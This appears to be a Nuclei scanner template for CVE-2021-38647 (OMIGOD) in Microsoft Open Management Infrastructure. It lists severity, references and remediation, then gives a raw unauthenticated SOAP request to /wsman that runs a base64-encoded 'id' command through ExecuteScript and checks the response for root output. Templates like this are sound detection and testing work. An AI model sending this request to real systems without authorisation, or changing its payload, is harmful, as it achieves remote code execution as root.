id: CVE-2021-38647
info:
name: Microsoft Open Management Infrastructure - Remote Code Execution
author: daffainfo,xstp
severity: critical
description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).
reference:
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
- https://github.com/microsoft/omi
remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-38647
cwe-id: CWE-665
epss-score: 0.97478
cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microsoft
product: azure_automation_state_configuration
tags: cve,cve2021,rce,omi,microsoft,kev
http:
- raw:
- |
POST /wsman HTTP/1.1
Host: {{Hostname}}
Content-Type: application/soap+xml;charset=UTF-8
HTTP://{{Hostname}}/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
102400
uuid:00B60932-CC01-0005-0000-000000010000
PT1M30S
root/scx
aWQ=
0
true
matchers:
- type: word
words:
- ''
- 'uid=0(root) gid=0(root) groups=0'
condition: and